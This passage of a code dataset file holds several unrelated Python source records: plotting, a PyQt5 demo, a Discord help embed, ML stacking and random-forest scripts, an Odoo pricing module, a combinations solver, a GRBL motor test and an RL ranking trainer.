7)\nplt.xlabel(\"TimeSteps\")\nplt.ylabel(\"Error\")\nplt.plot(Fig4)\nplt.show()\nplt.xlim(0, 1460)\nplt.ylim(0, 7)\nplt.xlabel(\"TimeSteps\")\nplt.ylabel(\"Error\")\nplt.plot(Fig5)\nplt.show()\n\nplt.plot(Fig1, label=\"x_a = KF(x_f, y)\")\nplt.plot(Fig2, label=\"x_a = x_f\")\nplt.plot(Fig3, label=\"x_a = y\")\nplt.plot(Fig4, label=\"x_a = (x_f + y)/2\")\nplt.xlim(0, 1460)\nplt.ylim(0, 7)\nplt.xlabel(\"TimeSteps\")\nplt.ylabel(\"Error\")\n#plt.legend(loc=2)\n#plt.legend(bbox_to_anchor=(1.05, 1), loc=2)#, borderaxespad=0.)\n#plt.savefig(\"Fig4.png\",format = 'png', dpi=300)\nplt.show()\n\n\n#誤差のノルムを計算\nFig1 = np.array(Fig1)\nFig2 = np.array(Fig2)\nFig3 = np.array(Fig3)\nFig4 = np.array(Fig4)\nFig5 = np.array(Fig5)\nprint(Fig1.mean(), Fig2.mean(), Fig3.mean(), Fig4.mean(), Fig5.mean())\nprint(Fig1.std(), Fig2.std(), Fig3.std(), Fig4.std(), Fig5.std())\n","sub_path":"aineko27_nakamura_20160524/problem5_1.py","file_name":"problem5_1.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"378637817","text":"# 2.信号与槽\n''' qt中没中组件都有所谓的信号槽(slot)机制。可以用来将信号与相应的处理函数进行连接绑定 '''\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\nimport sys\nclass MainWidnow(QMainWindow):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.windowTitleChanged.connect(self._my_func)\n\n # 设置窗口标题\n self.setWindowTitle('My First App')\n\n # 设置标签\n label = QLabel('Welcome to shiyanlou!')\n # 设置标签显示在中央\n label.setAlignment(Qt.AlignCenter)\n self.setCentralWidget(label)\n\n def _my_func(self, s='my_func', a=100):\n dic = {'s': s, 'a': a}\n print(dic)\n\napp = QApplication(sys.argv)\nwindow = MainWidnow()\n\nwindow.show()\napp.exec_()","sub_path":"pyqt/study/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"13387750","text":"import discord\n\n\nbuttons = [\"🔎\", \"🎲\", \"💰\", \"🎶\", \"⚙\", \"🗑\"]\n\npage1 = discord.Embed(title=\"🔎\", description=\"Help:\\n\"\n \"**Hier wird grade Gearbeitet **\", colour=discord.Colour(0xb8e986))\n\npage2 = discord.Embed(title=\"🎲\", description=\"Fun:\\n\"\n \"**Hier wird grade Gearbeitet **\\n\"\n \"**Hier wird grade Gearbeitet **\\n\", colour=discord.Colour(0xb8e986))\n\npage3 = discord.Embed(title=\"💰\", description=\"General:\\n\"\n \"**Hier wird grade Gearbeitet **\", colour=discord.Colour(0xb8e986))\n\npage4 = discord.Embed(title=\"🎶\", description=\"Musikbot:\\n\"\n \"**Hier wird grade Gearbeitet **\", colour=discord.Colour(0xb8e986))\n\npage5 = discord.Embed(title=\"⚙\", description=\"Admin Tools:\\n\"\n \"**Hier wird grade Gearbeitet **\", colour=discord.Colour(0xb8e986))\n\n\nhelp_pages = [page1, page2, page3, page4, page5]\n\n\n\n","sub_path":"const/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"303725058","text":"\nimport pandas as pd\nimport numpy as np\nimport joblib\nfrom pathlib import Path\nfrom sklearn.model_selection import StratifiedKFold\nfrom xgboost.sklearn import XGBClassifier as XGBoost\n\nimport os\nimport sys\n\nsys.path.append('../')\n\n\nRandon_seed = 10\nnjobs = 8\nPath('./Models/TrainADP/').mkdir(exist_ok = True,parents = True)\n\ndef base_clf(clf,X_train,y_train,model_name,n_folds=5):\n ntrain = X_train.shape[0]\n nclass = len(np.unique(y_train))\n kf = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=Randon_seed)\n base_train = np.zeros((ntrain,nclass))\n for train_index, test_index in kf.split(X_train,y_train):\n kf_X_train,kf_y_train = X_train[train_index],y_train[train_index]\n kf_X_test = X_train[test_index]\n clf.fit(kf_X_train, kf_y_train)\n base_train[test_index] = clf.predict_proba(kf_X_test)\n clf.fit(X_train,y_train)\n joblib.dump(clf,f'./Models/TrainADP/{model_name}.model')\n return base_train[:,-1]\n\n\n\n\n\ndef StackADPfeature(file):\n final_Features = []\n feature_Name = ['AAC', 'BPNC', 'CTD', 'DPC']\n y = file[0]\n y = np.array([1 if i < 248 else 0 for i in range(407)])\n for j in range(1, len(file)):\n X = file[j]\n final_Features.append(base_clf(XGBoost(), X, np.array(y), feature_Name[j - 1]))\n Features = pd.DataFrame(np.array(final_Features).T, columns=feature_Name)\n y = pd.DataFrame(y,columns=['class'])\n TRFeatures = pd.concat([y,Features],axis=1,join='inner')\n file_path = ('ADPT12/Train/ADPT12Stack.csv')\n TRFeatures.to_csv(file_path,index=False)\n return file_path\n\n\n","sub_path":"ADPT12/StackADP.py","file_name":"StackADP.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"39058344","text":"# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestRegressor\r\n\r\n\r\ndef predict(a,b,c,d,e,f,g,h,i,j,k,l):\r\n\r\n\ty_predAll = []\r\n\r\n\tfor i in range(14,19):\r\n\r\n\r\n\t\t# Importing the dataset\r\n\t\tdataset = pandas.read_excel('data.xlsx')\r\n\t\tX = dataset.iloc[0:35, 1:13].values\r\n\t\ty = dataset.iloc[0:35, i-1:i].values\r\n\r\n\r\n\t\t\r\n\r\n\t\t#topred = [308,0.00124153,992,53.1,0.1154,0.00125,0.6651088,107,0.000001417,50.47,90366,9.2]\r\n\t\ttopred = [a,b,c,d,e,f,g,h,i,j,k,l]\r\n\t\ttopred2 = np.array(topred).reshape(1, -1)\r\n\t\t\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t\tX_train,X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=34)\r\n\r\n\t\t# print(X_test[0])\r\n\r\n\t\t# Fitting Random Forest Regression to the dataset\r\n\r\n\t\tregressor = RandomForestRegressor(n_estimators = 10, random_state = 42)\r\n\t\tregressor.fit(X_train, y_train.ravel())\r\n\r\n\t\t# Predicting a new result\r\n\t\ty_pred = regressor.predict(topred2)\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\tfor x in np.nditer(y_pred):\r\n \t\t\ty_predAll.append(str(x))\r\n \t\t\t\r\n\r\n\t\r\n\treturn y_predAll\r\n\r\n\r\n\t\t# Calculation of Mean Squared Error (MSE)\r\n\t\t#print(r2_score(y_test,y_pred))\r\n\r\n\r\npredict(308,0.00124153,992,53.1,0.1154,0.00125,0.6651088,107,0.000001417,50.47,90366,9.2)\r\n","sub_path":"templates/UserViews/RT.py","file_name":"RT.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"169749516","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nimport odoo.addons.decimal_precision as dp\nfrom openerp.exceptions import UserError, RedirectWarning, ValidationError\n\n\nclass SaleOrderLine(models.Model):\n _inherit = 'sale.order.line'\n\n dnk_minimum_quantity = fields.Text('-Minimun Qty.', store=True)\n dnk_volume_prices = fields.Text('-Volume Prices', store=True)\n\n\n @api.model\n def write(self, vals):\n dnk_minimum_quantity, dnk_volume_prices = self._get_volume_prices_per_sale_line(self.order_id, self.product_id, self.product_uom, self.product_uom_qty, self.price_unit)\n vals_append = {\n 'dnk_minimum_quantity': dnk_minimum_quantity,\n 'dnk_volume_prices': dnk_volume_prices,\n }\n vals.update(vals_append)\n return super(SaleOrderLine, self).write(vals)\n\n\n @api.model\n def create(self, vals):\n sale_order = self.env['sale.order'].browse(vals.get('order_id'))\n product = self.env['product.product'].browse(vals.get('product_id'))\n product_uom = self.env['product.uom'].browse(vals.get('product_uom'))\n product_uom_qty = vals.get('product_uom_qty')\n price_unit = vals.get('price_unit')\n\n dnk_minimum_quantity, dnk_volume_prices = self._get_volume_prices_per_sale_line(sale_order, product, product_uom, product_uom_qty, price_unit)\n\n vals_append = {\n 'dnk_minimum_quantity': dnk_minimum_quantity,\n 'dnk_volume_prices': dnk_volume_prices,\n }\n vals.update(vals_append)\n\n return super(SaleOrderLine, self).create(vals)\n\n\n def _formatLang(self, value, show_currency=True):\n lang = self.order_id.partner_id.lang\n lang_objs = self.env['res.lang'].search([('code', '=', lang)])\n if not lang_objs:\n lang_objs = self.env['res.lang'].search([], limit=1)\n lang_obj = lang_objs[0]\n\n decimals_quantity = self.env['decimal.precision'].search([('name', '=', 'Product Price')])\n if decimals_quantity:\n decimals_quantity = decimals_quantity[0].digits\n else:\n decimals_quantity = 2\n\n res = lang_obj.format('%.' + str(decimals_quantity) + 'f', value, grouping=True, monetary=True)\n currency_obj = self.order_id.currency_id\n\n if show_currency and currency_obj and currency_obj.symbol:\n if currency_obj.position == 'after':\n res = '%s%s' % (res, currency_obj.symbol)\n elif currency_obj and currency_obj.position == 'before':\n res = '%s%s' % (currency_obj.symbol, res)\n return res\n\n\n def GetExtraPriceVariantProduct(self, product_id, currency_id):\n # Buscar si el producto tiene \"atributos\": attribute_value_ids != False\n extra_price = 0.00\n if product_id.attribute_value_ids != False:\n for attribute_value in product_id.attribute_value_ids:\n if attribute_value.attribute_id.name=='EST-TALLA ROPA':\n if attribute_value.name in ('2XL', '3XL', '4XL', '5XL'):\n extra_price = 2.00\n if attribute_value.name in ('6XL', '7XL'):\n extra_price = 4.00\n\n # Si la Lista de Precios no es en USD, convertir extra_price a la moneda de la lilsta de precios\n if currency_id.name != \"USD\":\n ResCurrencyRate = self.env['res.currency.rate']\n tipo_de_cambio = ResCurrencyRate.search([('currency_id', '=', 3)], limit=1, order=\"name desc\")\n if tipo_de_cambio:\n tipo_de_cambio = tipo_de_cambio[0].rate2\n else:\n tipo_de_cambio = 1.00\n\n extra_price *= tipo_de_cambio\n\n return(extra_price)\n\n def _get_volume_prices_per_sale_line(self, order_id, product_id, product_uom, product_uom_qty, price_unit):\n if not (product_id and order_id.partner_id\n and order_id.pricelist_id):\n return('', '')\n\n # Si la lista de precios tiene un sólo \"Item\" entonces para extraer\n # las cantidades ir a la lista de precios base del \"Item\"\n if len(order_id.pricelist_id.item_ids) == 1:\n if order_id.pricelist_id.item_ids[0].base == 'list_price':\n search_pricelist_id = order_id.pricelist_id.item_ids[0].base_pricelist_id\n else:\n search_pricelist_id = order_id.pricelist_id.id\n else:\n search_pricelist_id = order_id.pricelist_id.id\n\n # Falta buscar por Variante\n ProductPriceListItem = self.env['product.pricelist.item']\n price_list = ProductPriceListItem.search(\n [('pricelist_id', '=', search_pricelist_id),\n ('product_tmpl_id', '=', product_id.product_tmpl_id.id)], order=\"min_quantity DESC\")\n\n context_partner = dict(self.env.context, partner_id=order_id.partner_id.id, date=order_id.date_order)\n pricelist_context = dict(context_partner, uom=product_uom.id)\n\n extra_price = self.GetExtraPriceVariantProduct(product_id, order_id.pricelist_id.currency_id)\n\n str_prices = ''\n str_mininimum_quantity = ''\n unit_price = \"\"\n for price in price_list:\n if price.id and price.min_quantity:\n # Marco: Usa esta función para extraer la precio de la tarifa pública de la siguiente manera:\n # Comando para debuggear:\n # sudo su - odoo9dev -c \"/opt/odoo9dev/odoo/openerp-server --config /etc/odoo9dev/odoo.conf --dev\"\n # tarifa_publica = self.env['res.lang'].search([('name', '=', 'Nombre de la tarifa publica')])\n # context_partner = dict(self.env.context, partner_id=order_id.partner_id.id, date=order_id.date_order)\n # pricelist_context = dict(context_partner, uom=product_uom.id)\n # tarifa_publica..with_context(pricelist_context).get_product_price_rule(product_id, price.min_quantity, order_id.partner_id)\n unit_price, rule_id = order_id.pricelist_id.with_context(pricelist_context).get_product_price_rule(product_id, price.min_quantity, order_id.partner_id)\n str_prices += self._formatLang(unit_price + extra_price, show_currency=False) + \"\\n\"\n str_mininimum_quantity += '{:0,.0f}'.format(price.min_quantity) + \"\\n\"\n\n # En caso de que el producto no se encuentre en la lista de precio, calcular el precio\n if unit_price == \"\":\n product = product_id.with_context(\n lang=order_id.partner_id.lang,\n partner=order_id.partner_id.id,\n quantity=product_uom_qty,\n date=order_id.date_order,\n pricelist=order_id.pricelist_id.id,\n uom=product_uom.id,\n fiscal_position=self.env.context.get('fiscal_position')\n )\n unit_price, rule_id = order_id.pricelist_id.with_context(pricelist_context).get_product_price_rule(product_id, product_uom_qty, order_id.partner_id)\n price_unit = unit_price\n\n if str_prices == \"\" or str_mininimum_quantity == \"\":\n str_prices = self._formatLang(price_unit + extra_price, show_currency=False)\n str_mininimum_quantity = '{:0,.0f}'.format(product_uom_qty)\n\n return(str_mininimum_quantity, str_prices)\n\n\n @api.onchange('product_id')\n def _get_volume_prices(self):\n for sale_order_line in self:\n dnk_minimum_quantity, dnk_volume_prices = self._get_volume_prices_per_sale_line(sale_order_line.order_id, sale_order_line.product_id, self.product_uom, self.product_uom_qty, self.price_unit)\n\n sale_order_line.dnk_minimum_quantity = dnk_minimum_quantity\n sale_order_line.dnk_volume_prices = dnk_volume_prices\n\n\n @api.onchange('product_uom', 'product_uom_qty')\n def product_uom_change(self):\n if not self.product_uom or not self.product_id:\n self.price_unit = 0.0\n return\n if self.order_id.pricelist_id and self.order_id.partner_id:\n product = self.product_id.with_context(\n lang=self.order_id.partner_id.lang,\n partner=self.order_id.partner_id.id,\n quantity=self.product_uom_qty,\n date=self.order_id.date_order,\n pricelist=self.order_id.pricelist_id.id,\n uom=self.product_uom.id,\n fiscal_position=self.env.context.get('fiscal_position')\n )\n self.price_unit = self.env['account.tax']._fix_tax_included_price_company(self._get_display_price(product), product.taxes_id, self.tax_id, self.company_id)\n extra_price = self.GetExtraPriceVariantProduct(self.product_id, self.order_id.pricelist_id.currency_id)\n self.price_unit += extra_price\n","sub_path":"denker/dnk_sale_volume_quotation/models/sale_order_line.py","file_name":"sale_order_line.py","file_ext":"py","file_size_in_byte":8847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"449909915","text":"class Solution(object):\n def combine(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: List[List[int]]\n \"\"\"\n\n def dfs(nums, last_num):\n\n if len(nums) == k:\n res.append(nums)\n\n for i in range(last_num + 1, n + 1):\n dfs(nums + [i], i)\n\n if not n or not k:\n return []\n res = []\n\n for i in range(1, n + 1):\n dfs([i], i)\n return res","sub_path":"77. Combinations.py","file_name":"77. Combinations.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"147130698","text":"from serial import Serial\nfrom serial.tools.list_ports_posix import comports\nimport time\ndebug = True\n\n## https://www.staticboards.es/blog/dominar-motor-paso-a-paso-con-grbl/\n## https://www.youtube.com/watch?v=KXyS63nO_rU \ndef get_port_name():\n ''' Displays information to terminal to led the user select the comport (Arduino USB connection)'''\n cps = comports()\n print('Printing devices available.')\n if len(cps)==0:\n print('Error: Seems empty ...')\n print('Exiting...')\n exit()\n for cp, i in enumerate(cps):\n print(str(i)+')',cp)\n print('Select the device.\\n>',end='')\n us = input()\n device = 0\n if us !='':\n try:\n device=int(us)\n except:\n print('Not a number, selecting ', device,cps[device].device )\n return cps[device].device\n\n\ndef send_command(ser,cmd):\n ''' Sends info to the Arduino and waits 1ms to response.\n Returns response.'''\n ser.write((cmd+'\\n').encode())\n if debug:print('TO ->',cmd.replace('\\r\\n','\\r\\n\\t\\t'))\n time.sleep(0.01)\n response_u = b''.join(ser.readlines())\n response = response_u.decode() \n if debug and response != '\\r\\n' :print('FROM <-',response.replace('\\r\\n','\\r\\n\\t\\t'))\n return(response)\n\n\ndef velocitytest(ser):\n send_command(ser,'$112=100')\n send_command(ser,'g01 z0')\n for i in range(1,4):\n print('To zero position')\n ## first slowly\n print('To 10 position')\n send_command(ser,'g00 z.5 f'+str(i)) \n time.sleep(2)\n send_command(ser,'g00 z-.5 f'+str(2*i))\n time.sleep(2)\n send_command(ser,'$112='+str(100+25*i))\n send_command(ser,'g01 z0')\n\nif __name__ == \"__main__\":\n print('Starting system...')\n motor = get_port_name()\n print()\n print('Motor at ',motor)\n ser = Serial(motor,115200,timeout=0) # serial connection to arduino GRBL\n print('Starting connection to', motor)\n time.sleep(2)\n print(send_command(ser,'?'))\n #send_command(ser,'$112=50')\n velocitytest(ser) \n\n","sub_path":"testing_m.py","file_name":"testing_m.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"277399476","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 16 14:16:35 2020\n\n@author: hmenet\n\"\"\"\n\n###############################################\n#local search for three levels reconciliations\n#events rates\n#both or only one reconciliation rates\n###############################################\n\nimport random as rd\nimport numpy as np\n\nfrom three_levels_rec_heuristics import gene_3_level_rec\n\ndef from_2_rates_vect_to_1(rates_hp, rates_g):\n rates=dict()\n rates[\"Thp\"] = rates_hp[\"T\"]\n rates[\"Dhp\"] = rates_hp[\"D\"]\n rates[\"Lhp\"] = rates_hp[\"L\"]\n rates[\"Tg\"] = rates_g[\"T\"]\n rates[\"Dg\"] = rates_g[\"D\"]\n rates[\"Lg\"] = rates_g[\"L\"]\n return rates\n\ndef from_1_rates_vect_to_2(rates):\n rates_g=dict()\n rates_hp=dict()\n rates_hp[\"T\"] = rates[\"Thp\"]\n rates_hp[\"D\"] = rates[\"Dhp\"]\n rates_hp[\"L\"] = rates[\"Lhp\"]\n rates_g[\"T\"] = rates[\"Tg\"]\n rates_g[\"D\"] = rates[\"Dg\"]\n rates_g[\"L\"] = rates[\"Lg\"]\n return rates_hp, rates_g\n\n \n#only_gene : modify only gene upper reconciliation rates\n#only upper : modify only parasite host reconciliation rates\n#move_proba : if new likelihood is less than the current, we move if x best_likelihood:\n if first_step :\n first_step=False\n best_likelihood=new_likelihood\n best_rates=new_rates.copy()\n move=True\n else:\n x=rd.random()\n #because likelihood is negative\n if x 1.0:\n return False\n\n\n return True\n\n\ndef industry_earnings_test(ticker):\n pass\n\n\ndef days_to_cover_test(ticker):\n \"\"\"Give Days to Cover a passing score if the number of days is less than 2 days.\"\"\"\n\n days_to_cover = pull_days_to_cover(ticker)\n if float(days_to_cover) >= 2:\n return False\n\n return True\n\n\ndef insider_trading_test(ticker):\n \"\"\"Give Insider Trading a passing score if the net activity for the past 3 months has been positive\"\"\"\n\n net_activity = pull_recent_net_insider_trading(ticker)\n\n if '(' in net_activity:\n return False\n\n return True\n\n\ndef weighted_alpha_test(ticker):\n pass\n","sub_path":"dev/nasdaq_dozen_test.py","file_name":"nasdaq_dozen_test.py","file_ext":"py","file_size_in_byte":10599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"30719476","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^mycv/$', views.Myc2vView.as_view(), name='myc2v'),\n url(r'^myc2v/connexion$', views.Myc2vLoginView, name='myc2v_login'),\n url(r'^myc2v/theme$', views.theme, name='myc2v-theme'),\n url(r'^myc2v/webcam$', views.webcam, name='youtube'), \n url(r'^myc2v/download$', views.download, name='download'), \n url(r'^myc2v/audio$', views.audio, name='audio'), \n url(r'^myc2v/upload_audio$', views.upload_audio, name='upload_audio'), \n url(r'^cv/(?P\\d+)-(?P[-\\w\\d]+)$$', views.C2vView, name='c2v_view'),\n url(r'^cv/linkedin$', views.ManualImportLinkedin, name='manual-import'),\n]","sub_path":"c2v/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"424761696","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 18 16:40:05 2019\n\n@author: Harold\n\"\"\"\n\n#Known Forces \nP = 37.9*10**3 #F_act2 [N]\nq = 2.71*10**3 #Aerodynamic load [N/m]\n\n#Known Variables\nC_a = 0.484 #chord length [m]\nl_a = 1.691 #span aileron [m]\nx_1 = 0.149 #location hinge 1 [m]\nx_2 = 0.554 #location hinge 2 [m]\nx_3 = 1.541 #location hinge 3 [m]\nx_a = 0.272 #distance between act 1 and 2 [m]\nh = 0.173 #aileron height [m]\nt_sk = 1.1*10**-3 #skin thickness [m]\nt_sp = 2.5*10**-3 #spar thickness [m]\nt_st = 1.2*10**-3 #stiffener thickness [m]\nh_st = 1.4*10**-2 #height stiffener [m]\nw_st = 1.8*10**-2 #width stiffener [m]\nn_st = 13 #number of stiffeners [-]\nd_1 = 0.681*10**-2 #vert displ hinge 1 [m]\nd_3 = 2.03*10**-2 #vert displ hinge 3 [m]\ntheta = 26. #max upwards deflect [deg]\n\n#Material and Sturctural Properties\nE = 73.1*10**9 #E-modulus [Pa]\nG = 28.*10**9 #Shear Modulus [Pa]\ntau_ult = 283.*10**6 #Shear Strength [Pa]\n\n","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"14243862","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys, getopt, csv, json, uuid, datetime\nimport requests, random, string\n\n# Suppress InsecureRequestWarning in urllib3\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n## Define variables\ncontroller_ip = '192.168.83.211'\nauth = json.loads('{\"login\":{\"user\":\"sdn\",\"password\":\"skyline\",\"domain\":\"sdn\"}}')\nauth_path = 'https://' + controller_ip + ':8443/sdn/v2.0/auth'\napi_path = 'https://' + controller_ip + ':8443/sdn/fw/v1.0/firewall'\nheaders = {'content-type': 'application/json'}\n\n## Manage authentication\nresponse = requests.post(auth_path, data=json.dumps(auth), headers=headers, verify=False)\ndata = response.json()\ntoken = data[u'record'][u'token']\ntimestamp = data[u'record'][u'expiration'] / 1000\ntoken_expiration = datetime.datetime.fromtimestamp(timestamp)\nheaders['X-Auth-Token'] = token\n\n\ndef main():\n parameters = arguments(sys.argv[1:])\n add_rules_to_ACL(parameters)\n\n\ndef arguments(argv):\n '''\n Parse commandline arguments\n '''\n try:\n opts, args = getopt.getopt(argv, \"h\", [\"help\", \"amount=\"])\n except getopt.GetoptError as e:\n print(\"\\n\")\n print(str(e))\n usage()\n sys.exit(2)\n amount = 1000\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n elif opt == \"--amount\":\n amount = arg\n else:\n usage()\n sys.exit()\n return amount\n\ndef add_rules_to_ACL(amount):\n '''\n Add rules from a file to ACL\n '''\n rules = []\n for i in range(1000):\n rule = {}\n rule['id'] = str(uuid.uuid4())\n rule['name'] = randomName(10)\n rule['src'] = None\n rule['srcPort'] = randomNumber(49151)\n rule['srcMask'] = None\n rule['dst'] = str(randomNumber(255)) + '.' + str(randomNumber(255)) + '.' + str(randomNumber(255)) + '.' + str(randomNumber(255))\n rule['dstPort'] = randomNumber(49151)\n rule['dstMask'] = None\n rule['protocol'] = \"ANY\"\n rule['action'] = \"BLOCK\"\n rule['appId'] = None\n rule['bidirectional'] = True\n rule['vlanId'] = None\n rule['disabled'] = False\n rule['scheduledInitialDate'] = None\n rule['scheduledFinalDate'] = None\n rules.append(rule)\n print(json.dumps(rules, indent=4))\n\n for item in rules:\n response = requests.post(api_path, data=json.dumps(item), headers=headers, verify=False)\n\ndef randomName(length):\n return ''.join(random.choice(string.ascii_lowercase) for i in range(length))\n\ndef randomNumber(limit):\n return random.randint(1, limit)\n\ndef usage():\n '''\n Print usage info\n '''\n print(\n '''\n USAGE:\n\n --help Display this help\n --amount CSV file containing all the rules\n ''')\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"CyberTrust/Protector_ACL_and_Blacklist/add_ACL_test.py","file_name":"add_ACL_test.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"621344849","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport os\r\nimport copy\r\nimport numpy as np\r\nimport datetime\r\nimport tensorflow as tf\r\nfrom Env import Documents\r\nfrom dataset import Dataset\r\nfrom utils.io_utils import base_args\r\nfrom approachs.dqn_model import MontCarloModel\r\nfrom approachs.lp_model import Evaluator\r\nfrom utils.io_utils import write_args \r\n\r\n\r\ndef parse_args():\r\n parser = base_args()\r\n parser.add_argument('--algo', default='MontCarlo', type=str, help='algorithm name')\r\n parser.add_argument('--epochs', default=6, type=int, help='epochs of each iteration.')\r\n parser.add_argument('--batch_size', default=128, type=int, help='batch size')\r\n parser.add_argument('--rep_num', default=1, type=int, help='samples repeat number')\r\n parser.add_argument('--learning_rate', default=1e-5, type=float, help='learning rate')\r\n parser.add_argument('--gamma', default=1.0, type=float, help='discount rate')\r\n parser.add_argument('--c_entropy', default=0.001, type=float, help='entropy coefficient in loss')\r\n parser.add_argument('--update_steps', default=4, type=int, help='train times every batch')\r\n parser.add_argument('--decay_steps', default=3000, type=int, help='learning rate decay steps')\r\n parser.add_argument('--decay_rate', default=1.0, type=float, help='learning rate decay rate')\r\n parser.add_argument('--timestamp', type=str, default=datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\"))\r\n parser.add_argument('--evaluator_path', type=str, default='model_eval', help='evaluator ckpt dir')\r\n FLAGS, _ = parser.parse_known_args()\r\n return FLAGS\r\n\r\n\r\nif __name__ == \"__main__\":\r\n args = parse_args()\r\n print(args)\r\n write_args(args, './model_params.txt')\r\n # dataset\r\n doc = Documents(num_total=args.num_documents, \r\n num_feature=args.feature_size, \r\n num_visible=args.feature_size_vis, \r\n seed=100)\r\n train_set = Dataset(doc, 'train')\r\n val_set = Dataset(doc, 'validation')\r\n model_path = os.path.join(args.checkpointDir, args.algo, args.timestamp)\r\n model = MontCarloModel(args, model_path, args.algo)\r\n evaluator = Evaluator(model_path=os.path.join(os.path.dirname(os.path.realpath(__file__)), args.evaluator_path))\r\n with model.model_graph.as_default() as g: \r\n sess = tf.Session(graph=g)\r\n model.set_sess(sess)\r\n\r\n path1, path2 = os.path.join(model_path, 'train'), os.path.join(model_path, 'test')\r\n if not os.path.isdir(path1):\r\n os.makedirs(path1)\r\n if not os.path.isdir(path2):\r\n os.makedirs(path2)\r\n train_writer = tf.summary.FileWriter(path1, g)\r\n test_writer = tf.summary.FileWriter(path2, g)\r\n \r\n sess.run(tf.global_variables_initializer())\r\n model.load_model()\r\n\r\n metrics_name = ['total_loss', 'returns', 'gauc', 'ndcg']\r\n c_entropy = args.c_entropy\r\n for e in range(args.epochs):\r\n print('Epoch: %d' % (e))\r\n while True:\r\n try:\r\n x_data_id, x_data, y = train_set.read(args.batch_size)\r\n # tile\r\n shape1 = x_data_id.shape\r\n x_data_id = np.tile(x_data_id, (1, args.rep_num)).reshape((-1, shape1[1]))\r\n shape2 = x_data.shape\r\n x_data = np.tile(x_data, (1, args.rep_num, 1)).reshape((-1, shape2[1], shape2[2]))\r\n shape3 = y.shape\r\n y = np.tile(y, (1, args.rep_num)).reshape((-1, shape3[1])) \r\n \r\n act_idx_out, q_pred_one, rl_outputs, mask_arr, _, _, gauc, ndcg, summary1 = model.predict(x_data, y)\r\n rewards = evaluator.predict(rl_outputs).reshape((-1, args.slate_size))\r\n \r\n for _ in range(args.update_steps):\r\n total_loss, mean_return, summary2, step = \\\r\n model.train(x_data, rl_outputs, q_pred_one, act_idx_out, rewards, mask_arr, c_entropy)\r\n\r\n if step % (10 * int(args.update_steps)) == 0:\r\n print('step: %d'%(step), ', '.join([name+': '+str(value) for name, value in zip(metrics_name, [total_loss, mean_return, gauc, ndcg])]))\r\n train_writer.add_summary(summary1, step)\r\n train_writer.add_summary(summary2, step)\r\n\r\n # validation\r\n if step % (100 * int(args.update_steps)) == 0:\r\n # validation set\r\n metrics_value = [[] for _ in range(len(metrics_name[1:]))]\r\n\r\n while True:\r\n try:\r\n x_data_id_e, x_data_e, y_e = val_set.read(1000)\r\n act_idx_out, act_probs_one, rl_outputs, mask_arr, _, _, gauc, ndcg, _ = model.predict(x_data_e, y_e)\r\n rewards = evaluator.predict(rl_outputs).reshape((-1, args.slate_size))\r\n\r\n _, mean_return = model.get_long_reward(rewards)\r\n for v, vl in zip([mean_return, gauc, ndcg], metrics_value):\r\n vl.append(v)\r\n except Exception as e:\r\n print(e)\r\n break\r\n\r\n model.save_model()\r\n summary_val = tf.Summary(value=[tf.Summary.Value(tag=\"summary/\"+name, simple_value=np.mean(val)) \r\n for name, val in zip(metrics_name[1:], metrics_value)])\r\n test_writer.add_summary(summary_val, step)\r\n print('Validation:', ', '.join([name+': '+str(np.mean(val)) for name, val in zip(metrics_name[1:], metrics_value)]))\r\n except Exception as e:\r\n print(e)\r\n break\r\n 